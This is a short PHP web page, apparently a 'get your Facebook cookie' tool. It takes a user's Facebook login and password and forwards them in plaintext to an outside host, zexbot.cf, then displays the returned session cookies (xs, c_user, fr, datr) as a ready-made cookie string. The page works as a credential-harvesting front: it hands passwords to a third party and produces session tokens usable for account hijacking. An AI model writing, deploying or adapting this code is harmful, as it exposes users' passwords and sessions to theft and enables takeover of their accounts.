<!DOCTYPE html>

<html>

<head>

    <title>Đăng nhập và lấy cookie ngay trên điện thoại</title>

    <link href="css.css" rel="stylesheet" type="text/css"/>

 <link rel="icon" href="https://getcookie.ml/favicon.ico" type="image/x-ico"/>

<link href='http://fonts.googleapis.com/css?family=Roboto:400' rel='stylesheet' type='text/css'>

 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">



    </head>

<body >



<!--------Xử Lí------------>



<?php

$u = htmlentities($_POST['u']);

$p = htmlentities($_POST['p']);

$get=json_decode(auto('http://zexbot.cf/cookie/iphone.php?u='.$u.'&p='.$p.''),true); 

$xs =$get[session_cookies][1][value]; 

$fr =$get[session_cookies][2][value]; 

$datr =$get[session_cookies][3][value]; 

$id=$get[uid]; 

$error2=$get[error_code];

$log = 'xs='.$xs.';c_user='.$id.';fr='.$fr.';datr='.$datr.'';

function auto($url){

   $ch=curl_init();

   curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

   curl_setopt($ch,CURLOPT_URL,$url);

   $cx=curl_exec($ch);

  curl_close($ch);

  return($cx);

  }



?>

<!----------------------------->



<?php

if(empty($u) || empty($p)){echo '<script>alert("Lỗi !!!"); window.location = "index.html";</script>';} else  if($error2=="401"){echo '<script>alert("Wrong account or password !!!"); window.location = "index.php";</script>';} else {if($error2=="405"){ echo '<script>alert("Your account is temporarily locked. Go Back Facebook Validation Checkpoin And Back Here To Get A Cookie !!!"); window.location = "index.php";</script>';

} else  { echo '<script>alert("Get a Success Cookie !!!"); </script>';}}

?>







<form>

  <h1>THIS IS YOUR COOKIE </h1>

  <input type="text" value="<?php echo $log;?>">

  

</form>



<div class="footer-bar">

    <span class="article-wrapper">

        <span class="article-label">Source By: </span>

        <span class="article-link"><a href="http://www.facebook.com/iamhassansardar">Hassan SArdar</a></span>

    </span>

    

</div>

    



</body>

</html>